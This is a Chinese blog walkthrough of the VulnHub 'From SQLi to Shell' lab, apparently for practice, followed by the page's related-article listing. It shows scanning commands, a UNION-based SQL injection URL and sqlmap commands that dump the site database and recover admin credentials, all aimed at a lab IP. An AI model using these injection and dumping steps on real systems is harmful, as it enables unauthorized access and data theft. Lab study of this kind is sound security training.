Debian6靶机详解

已于 2024-10-31 12:22:06 修改
阅读量608 收藏 8
点赞数 4
文章标签: 网络安全
于 2024-07-28 17:12:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a666666688/article/details/140753151
版权

靶机下载

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

主机发现

arp-scan -l

 

636bf13520fa209bd1a484d3e6098566.png

端口扫描

nmap -A -sV -p- 192.168.48.138

 

3b427366383313f91dbbc6475a6cdc01.png

访问80端口

http://192.168.48.138:80

 

eda5cdce9587f560e3a80d6ddf31b72a.png

F12查看页面源码

 

d19ffb1b5e58d9de7df41e9ff85f3902.png

存在sql注入并发现了文件上传路径

访问文件上传路径

http://192.168.48.138/admin/uploads/

 

82f2b99c54ec7d0833a041009eeea6e6.png

访问admin

http://192.168.48.138/admin/login.php

 

32d9d36f6edafa4cb24ae29f688152c4.png

sql注入测试

http://192.168.48.138/cat.php?id=-2%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=database()--+

 

3717f3971304357f33b92952301b533f.png

sqlmap

跑数据库

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -dbs

 

b68c889dd99292738ea6e16e0daa706d.png

爆表和字段信息

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -D photoblog -dump-all

 

967a152f1b6c8bdebb95e6e224a9d49c.png

获得密码登录成功

 

c000a6c0caa6ce061f964243a93c5d61.png

目录扫描

python3 dirsearch.py -u http://192.168.48.138

 

71ad785c75e11c096b8a62a4334b6870.png

访问http://192.168.48.138/admin/

http://192.168.48.138/admin/login.php

 

3ba6ae3e1f0daea6373ed4454e5d6a9d.png

访问css/

http://192.168.48.138/css/

 

38a0863ddfe775bfe018cded6133e21d.png

 

 

 

 

fasewer
关注
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2613
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
Debian 6 网络安装
weixin_30650039的博客
12-25 218
为了更好的感受linux的魅力,笔者决定找一个更简洁的linux发行版试试,最后定在了debian上。 网络上对debian的评价非常高,比起其他发行版来说,debian最的魅力莫过于简洁。 debian的官网上提供了4中版本的ISO镜像下载,分别是: DVD版4G大小,最完整的发行版,包含了几乎所有你会用到的软件包。CD版700M大小,包含了所有常用的功能。netinsatll版191M大...
debian5 升级 debian6
weixin_34247155的博客
09-06 182
Debian 5升级至Debian 6 Posted on 2011/11/12 1.编辑/etc/apt/source.list文件,添加如下几行: deb http://ftp.us.debian.org/debian/ squeeze main deb-src http://ftp.us.debian.org/debian/ squeeze main deb ...
【转载】Debian 6安装小记
weixin_33967071的博客
08-08 197
转载自:http://unix-cd.com/vc/www/22/2011-06/18022.html   今天终于装上了 debian6,代号叫squeeze是吧?前几天的时候在Microhu’s Blog 中,正好遇到了博主问我用的是什么linx系统,于是聊起来了.当时Microhu说他用的是debian感觉速度很快的时候,我就心里痒痒了。一直都听 说debian很好,很稳定.虽然软件什么...
Debian 6 安装小记
gujing001的专栏
10-08 1194
Debian 6 安装小记 07.31.2011 · Posted in LAMP 上个月入手了mac,就把thinkpadr400冷落了蛮久。想着太浪费了,于是想着开始折腾系统。最开始是考虑unix中的freebsd, openbsd, netbsd,后来觉得还是回
Debian6安装笔记
__七把刀__
11-26 5503
安装debian真是费劲周折,从网上下载的是debian6.04的CD版本,只下载了CD1,里面包含的软件非常少,所以很多软件都需要自己动手安装了。 一、下载镜像 可以到Debian的官网http://cdimage.debian.org/debian-cd/6.0.6/i386/iso-cd/去下载最新的6.06版本,因为官网下载太慢,所以我到六维空间上面下了个6.04版本的CD1。CD1只
使用aspx实现payload免杀技术详解
同时,由于靶机环境还包括Debian,可能暗示攻击者需要考虑跨平台的攻击策略。通过这样的技术,攻击者可以在不触发安全警报的情况下,实现对目标系统的远程控制。对于防御者而言,了解这些免杀技术可以帮助提升网络...
利用Rundll32进行APT攻击与防御策略详解
攻击机(192.168.1.4)与靶机(192.168.1.119)之间的通信通过Rundll32.exe实现,展示了如何利用系统内置工具进行隐蔽的恶意活动,这在APT攻击中常见,因为它们倾向于利用系统资源来进行悄无声息的渗透。此外,还...
Game of Thrones : 权利的游戏
zhaji001
01-22 5102
简介 今年权利的游戏要上映最终季了,很是期待啊,争斗了那么久的权位,这次终于要和异鬼开打了。 祝你好运,老神和新人会保护你! 下载URL: https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/ 靶机使用:Virtualbox 攻击机:kali linux 0x001 信息收集 kali linux 是物理机器,所以就费点事,...
debian6.0 安装与配置
wangyezi19930928的专栏
08-27 1769
尝试过ge,重新安装Debian6.06 ,由于Debian 是比较纯洁的系统(相比Ubuntu,呵呵),所以绝大多数都需要手动修改!下面详述新装Debian系统需要做的工作: 一、修改源 # su  进入root模式  # vim  /etc/apt/sources.list 打开源文件 下面是我使用的源: deb http://mirrors.163.
debian6无法更新
norkter的专栏
11-19 333
这几天想升级下阿里云的服务器,顺便装几个软件,可是升级的时候,一直提示一堆乱七八糟的东西,其中比较重要的一句是: 1 update-rc.d: error: insserv rejected the script header google了半天无解,后来找到了这篇文章 http://forum.xbian.org/thread-1312-page-36.html 按照上面的方法,执...
linux debian u盘安装,U盘安装Debian 6成功
weixin_33104731的博客
05-07 260
需求是这样的:我的T60有两块硬盘。主硬盘上是Windows 7,光驱位置的硬盘上装Debian 6。当拔出光驱位的硬盘换上光驱后,Windows 7也要可以启动起来。常规做法是Windows 7安装grub4dos,硬盘安装Debian 6,把grub安装到主硬盘mbr。我之前的Debian 6如此安装的,但是这样带来的后果是我拔出光驱位硬盘后Windows 7启动不起来。所以只好修复Windo...
debian6 安装后的初始配置
随缘,随心
03-20 959
1. 将本地用户加入sudoers 在root用户下修改/etc/sudoers文件 chmod u+w /etc/sudoers 在文件中加一行username ALL=(ALL) ALL chmod u-w /etc/sudoers 2. 更新源 /etc/apt/source.list sudo cp /etc/apt/sources.list /etc/apt/so
Debian 6配置GNOME桌面环境
Canbus的专栏
12-26 4775
Debian 6配置GNOME桌面环境 1.安装xorg root@debian:~# apt-get install xorg 2.安装gdm(GNOME Display Manager) root@debian:~# apt-get install gdm 3.安装最小化的GNOME桌面环境 root@debian:~# apt-get instal
linux debian 6下载地址,Debian GNU/Linux 6.0 “Squeeze”正式发布下载
weixin_42358539的博客
05-12 568
Debian 6.0 "Squeeze"北京时间今天上午正式发布,带来众多新软件、特性和全新的主题。其软件包版本大致与Ubuntu 10.04相当,使用内核2.6.32,Gnome 2.30,KDE4.4.5等,强烈推荐升级。KDE Plasma Workspaces and KDE Applications 4.4.5an updated version of the GNOME desktop...
debian 6内核升级详解和卸载旧内核
nemo2011的专栏
05-02 6855
我的内核升级是从2.6.32.5到2.6.38.2。    开始这几部分是跟着下面这个文章做的:   http://blog.youkuaiyun.com/ctbinzi/article/details/6006931 先安装好所需软件,以及下载最新内核: #apt-get install kernel-package libncurses5-dev wget bzip2 make pat
debian 6.06下载地址
weixin_30680385的博客
11-03 756
安装光盘:http://cdimage.debian.org/debian-cd/6.0.6/amd64/iso-cd/ 源码:http://cdimage.debian.org/debian-cd/6.0.6/source/iso-cd/ 转载于:https://www.cnblogs.com/devgis/archive/2012/11/03/2752814.html...
debian6.0安装教程
Slow Sun的博客
05-11 1078
debian6.0 安装 Debian 6.0.3安装图解教程 2012年01月02日 ⁄ Debian ⁄ 评论数 1 ⁄ 被围观 13,713次+ 一、说明: Debian 6.0.3的安装镜像文件有8个DVD,安装基本系统只用到第一个镜像文件,即DVD1,其它镜像文件是附带的软件包。 二、安装系统:用光盘或者U盘成功引导后,出现下面的界面 界面说明: Install 安装系统 graphical install 图形安装 advanced options 高级
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值